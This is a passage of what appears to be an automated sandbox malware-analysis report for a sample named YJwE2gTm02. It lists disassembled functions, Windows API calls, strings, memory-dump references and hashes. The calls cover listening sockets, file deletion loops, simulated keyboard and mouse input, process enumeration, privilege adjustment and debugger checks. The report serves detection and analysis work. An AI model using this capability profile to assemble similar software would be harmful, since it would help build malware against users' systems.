
API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 5656ca3dc82c3cb1ca115d20d4de177e15d631c2412ff2265e4cac3dcdc415d7
Instruction ID: 834dbfb543c6215f68b4e8949691de56d666747d3f25dcc337a225834be2e639
Opcode Fuzzy Hash: 5656ca3dc82c3cb1ca115d20d4de177e15d631c2412ff2265e4cac3dcdc415d7
Instruction Fuzzy Hash: 9301F976624211AFFB5466B89D86FBF736C9F14790F150822FC13E21D1D5A55C4091A0

Function 00981204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00981276
WSAGetLastError.WSOCK32 ref: 00981283
bind.WSOCK32(00000000,?,00000010), ref: 009812BA
WSAGetLastError.WSOCK32 ref: 009812C5
closesocket.WSOCK32(00000000), ref: 009812F4
listen.WSOCK32(00000000,00000005), ref: 00981303
WSAGetLastError.WSOCK32 ref: 0098130D
closesocket.WSOCK32(00000000), ref: 0098133C

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: a5185ce9b508b81965730a10c31643d579c1f01171893aebe62a501cd89fa582
Instruction ID: 98fc0eed643a7aa06e566e83f33c8856b2e425d27ba9c6ef67c53ef85f2e13d7
Opcode Fuzzy Hash: a5185ce9b508b81965730a10c31643d579c1f01171893aebe62a501cd89fa582
Instruction Fuzzy Hash: A241A6716001109FD710EF68C884B69BBE9BF86318F188199E8569F3D6C771ED82CBE1

Function 0093B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0093B9D4
_free.LIBCMT ref: 0093B9F8
_free.LIBCMT ref: 0093BB7F
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,009A3700), ref: 0093BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,009D121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0093BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,009D1270,000000FF,?,0000003F,00000000,?), ref: 0093BC36
_free.LIBCMT ref: 0093BD4B

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: f786f72327b06f97f34945a9e5be41ccef7da002999b143787886e31849bd863
Instruction ID: fd08ae6313233efe10e3b63d64d9759b383990be18bee5eceb2df81ccfc52817
Opcode Fuzzy Hash: f786f72327b06f97f34945a9e5be41ccef7da002999b143787886e31849bd863
Instruction Fuzzy Hash: 4EC11472A04205AFDB24DF69DC51BAABBFCEF81310F14419AE694D7291EB319E41CF50

Function 0096D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00903AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00903A97,?,?,00902E7F,?,?,?,00000000), ref: 00903AC2

Part of subcall function 0096E199: GetFileAttributesW.KERNEL32(?,0096CF95), ref: 0096E19A

FindFirstFileW.KERNEL32(?,?), ref: 0096D420
DeleteFileW.KERNEL32(?,?,?,?), ref: 0096D470
FindNextFileW.KERNEL32(00000000,00000010), ref: 0096D481
FindClose.KERNEL32(00000000), ref: 0096D498
FindClose.KERNEL32(00000000), ref: 0096D4A1

Strings

\*.*, xrefs: 0096D3F2

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 6df842c08cbd0942bc6fee9a43aafcf15e22cb5ec907694eaf14e3dbadf74fd3
Instruction ID: ffc397fabad8251c93aa4bfa77f18ee7e5c7feb2b69e1077b51df2c1c7774ac9
Opcode Fuzzy Hash: 6df842c08cbd0942bc6fee9a43aafcf15e22cb5ec907694eaf14e3dbadf74fd3
Instruction Fuzzy Hash: EA314F7151D3459FC204EF64D891AAF77A8AED1314F444A1EF4E1921E1EB30EA099BA3

Function 0093E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0093E645

Strings

1#SNAN, xrefs: 0093F844
1#INF, xrefs: 0093F852
1#IND, xrefs: 0093F83D
1#QNAN, xrefs: 0093F84B

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 39c353872d8943a2c078b62a89a4c3b4c1e1d954416a1aac516433dbac322a2f
Instruction ID: a296aa3704d56989eed58287f7ba75eba01c6cc0276b89c859b7ea80f004987e
Opcode Fuzzy Hash: 39c353872d8943a2c078b62a89a4c3b4c1e1d954416a1aac516433dbac322a2f
Instruction Fuzzy Hash: 45C23C71E086298FDB25CF28DD547EAB7B9EB44304F1445EAD44EE7281E778AE818F40

Function 0097648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 009764DC
CoInitialize.OLE32(00000000), ref: 00976639
CoCreateInstance.OLE32(0099FCF8,00000000,00000001,0099FB68,?), ref: 00976650
CoUninitialize.OLE32 ref: 009768D4

Strings

.lnk, xrefs: 009764BA, 00976524, 009765E0

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: b6f625594cedf42f0dc7085f400decf1d5c0035e0feb618a4349c94be9c750ad
Instruction ID: c2b71dc0474fa9013c04e7f6a10c27784b99ba7bee6f26a4c3d01234ba54dde7
Opcode Fuzzy Hash: b6f625594cedf42f0dc7085f400decf1d5c0035e0feb618a4349c94be9c750ad
Instruction Fuzzy Hash: CAD139725086019FD314EF24C881A6BB7E9FFD8704F40896DF5998B292EB71ED05CB92

Function 009822DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 009822E8

Part of subcall function 0097E4EC: GetWindowRect.USER32(?,?), ref: 0097E504

GetDesktopWindow.USER32 ref: 00982312
GetWindowRect.USER32(00000000), ref: 00982319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00982355
GetCursorPos.USER32(?), ref: 00982381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 009823DF

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: 21736515ad018af56e8d13e57b1ddf8267af08424b9327f13445ee5acd7f2030
Instruction ID: 943a5cb26d9dd17f25fed70b1afb4ebbd87fa853a8fcf56b7529e732cc4c01b6
Opcode Fuzzy Hash: 21736515ad018af56e8d13e57b1ddf8267af08424b9327f13445ee5acd7f2030
Instruction Fuzzy Hash: E331C272508315AFD720EF58CC49B5BB7A9FF88714F00091AF98597291DB34E908CB92

Function 00979B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00909CB3: _wcslen.LIBCMT ref: 00909CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00979B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00979C8B

Part of subcall function 00973874: GetInputState.USER32 ref: 009738CB
Part of subcall function 00973874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00973966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00979BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00979C75

Strings

*.*, xrefs: 00979B5D

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 3b1c67124a02dbdb998fa0bea2582dbba2f7ab0a9fc7fa1c9db9bcccef764ef3
Instruction ID: f0839cba97ef1aaef5613f92a64dea1fef08d4c60fcaefb9dcf7443be90909e0
Opcode Fuzzy Hash: 3b1c67124a02dbdb998fa0bea2582dbba2f7ab0a9fc7fa1c9db9bcccef764ef3
Instruction Fuzzy Hash: 9741737290420AEFDF15DF64CD85BEEBBB8EF45310F148156E859A2291EB309E84CF61

Function 0091997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 00919BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00919BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 00919A4E
GetSysColor.USER32(0000000F), ref: 00919B23
SetBkColor.GDI32(?,00000000), ref: 00919B36

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: 55f825c554a647dec1921140a03d7d3ab4a47822e206bad161db4e4e0306936c
Instruction ID: 411d36a601593d8d306883cf0ce83954443f3f7fe040b4fdffbed327848e2c0f
Opcode Fuzzy Hash: 55f825c554a647dec1921140a03d7d3ab4a47822e206bad161db4e4e0306936c
Instruction Fuzzy Hash: 60A13C7031D408BEE725DA7DAC78EFB669DDF86301F14050AF802C6591CA299EC9D372

Function 00981806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0098304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0098307A
Part of subcall function 0098304E: _wcslen.LIBCMT ref: 0098309B

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0098185D
WSAGetLastError.WSOCK32 ref: 00981884
bind.WSOCK32(00000000,?,00000010), ref: 009818DB
WSAGetLastError.WSOCK32 ref: 009818E6
closesocket.WSOCK32(00000000), ref: 00981915

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 211490cc17c60d132ed16b7e064f607a39ea592863e677a48e007c449dc41fea
Instruction ID: da6dfa121d2ee87c6bddbe2812c5f2c7aebb0819fa4d1bcba718d2f9acca1252
Opcode Fuzzy Hash: 211490cc17c60d132ed16b7e064f607a39ea592863e677a48e007c449dc41fea
Instruction Fuzzy Hash: DA51B7B5A002109FE710EF24C886F6A77E9AB84718F14849CF9159F3D3D775AD82CBA1

Function 00991C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00991CC0
IsWindowEnabled.USER32 ref: 00991CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00991CDB
IsIconic.USER32 ref: 00991CE9
IsZoomed.USER32 ref: 00991CF7

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: c2cdd86d4334a453fae83794ff369b6883df1e4a2b0363e9e02e5ce35e6b03ea
Instruction ID: 4f110cad173ed26f00dc9f463e352fd0813dccb2d5b48c7391972670c11ca6a6
Opcode Fuzzy Hash: c2cdd86d4334a453fae83794ff369b6883df1e4a2b0363e9e02e5ce35e6b03ea
Instruction Fuzzy Hash: 2421C7717442125FDB208F1ED844B6A7BE9FF95315F198059E886CB391DB71EC42CB90

Function 00908060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00945DF0
VUUU, xrefs: 009083E8
VUUU, xrefs: 0090843C
VUUU, xrefs: 009083FA
ERCP, xrefs: 0090813C

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 5310ea0f3f7926de8aaa8b375c4d01423c96c6a1b559157a2fe0210a40c56a8e
Instruction ID: effe2ae2a10b2216c05eeac8a9b8a8aa385e75592a4385ac86c0de1e8eaf77b1
Opcode Fuzzy Hash: 5310ea0f3f7926de8aaa8b375c4d01423c96c6a1b559157a2fe0210a40c56a8e
Instruction Fuzzy Hash: D6A2B170E0061ACFDF24CF58C840BAEB7B5BF45310F2585AAE895A7285EB749D81CF91

Function 0098A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0098A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 0098A6BA

Part of subcall function 00909CB3: _wcslen.LIBCMT ref: 00909CBD

Process32NextW.KERNEL32(00000000,?), ref: 0098A79C
CloseHandle.KERNEL32(00000000), ref: 0098A7AB

Part of subcall function 0091CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00943303,?), ref: 0091CE8A

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 55a273796f59710c91e25b95e23bcf00caf0ea333944345dec58780c31ef43d4
Instruction ID: 06fad93ba75cc6e185a4a489b43585d349c5907fb8d1d79fbe2222e6fd3f9e39
Opcode Fuzzy Hash: 55a273796f59710c91e25b95e23bcf00caf0ea333944345dec58780c31ef43d4
Instruction Fuzzy Hash: D8514DB15083009FD710EF24C886A6BBBE8FFC9754F00891DF585972A2EB70E904CB92

Function 0096AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0096AAAC
SetKeyboardState.USER32(00000080), ref: 0096AAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0096AB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0096AB88

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 87e19ff58158af4614d6ecabbc9179945de9daf6abc298dbea5f15441640f60e
Instruction ID: 4b7086623773112bc4f9de9abb2586dc2eba44a970b5f5d0ad1001872047f3bd
Opcode Fuzzy Hash: 87e19ff58158af4614d6ecabbc9179945de9daf6abc298dbea5f15441640f60e
Instruction Fuzzy Hash: 3E311670A40208AEFB35CA798C05BFE7BAEAB55320F04421BF081A61D1D3798D81DB62

Function 0097CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 0097CE89
GetLastError.KERNEL32(?,00000000), ref: 0097CEEA
SetEvent.KERNEL32(?,?,00000000), ref: 0097CEFE

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 38096b53cfe06584e51429c791959f938ac38eb3aed45d3d82e343ffb15532c5
Instruction ID: 9cf4551996fda63955c44f9bd326df362b0baa8c0672f87da2db42ab348434a1
Opcode Fuzzy Hash: 38096b53cfe06584e51429c791959f938ac38eb3aed45d3d82e343ffb15532c5
Instruction Fuzzy Hash: AA21EDB25003059BEB20CFA5D988BAA77FCEF40304F10881EE54A92151E734EE449B60

Function 00968298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 009682AA

Strings

|, xrefs: 009682DA
(, xrefs: 009682F0

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 469f33bc1009decb1474ab8bf03f1cf5489e71453d40b0e9cfab3f3d21ca9850
Instruction ID: 8e55a48ba0049f5041b0beffc2e25f64feb74c45df78f4a6561dd230ba63e367
Opcode Fuzzy Hash: 469f33bc1009decb1474ab8bf03f1cf5489e71453d40b0e9cfab3f3d21ca9850
Instruction Fuzzy Hash: 15322475A007059FCB28CF59C481AAAB7F0FF48710B15C56EE49ADB3A1EB70E981CB44

Function 00975C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00975CC1
FindNextFileW.KERNEL32(00000000,?), ref: 00975D17
FindClose.KERNEL32(?), ref: 00975D5F

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 59f113f85ab39557ade94e6ace06f8babb6003bacf5b759af091f90f6be27a37
Instruction ID: 3605ad50522bc1ce9a000144cd20991b14de0a14879f065f23eba0ec3c8419f9
Opcode Fuzzy Hash: 59f113f85ab39557ade94e6ace06f8babb6003bacf5b759af091f90f6be27a37
Instruction Fuzzy Hash: 5151AA756046019FC714CF28C894E9AB7E8FF49324F15855EE9AA8B3A1CB70FC04CB91

Function 00932622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0093271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00932724
UnhandledExceptionFilter.KERNEL32(?), ref: 00932731

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: ff3ad617f6d59cfe3e76529723bbe25f26c6ab49f8a8ff59f4281ce2916cfbc6
Instruction ID: bb8d3b4d1bd036eca1c7889bbcc677a76c95d615f8dbbb50fea1811804c29695
Opcode Fuzzy Hash: ff3ad617f6d59cfe3e76529723bbe25f26c6ab49f8a8ff59f4281ce2916cfbc6
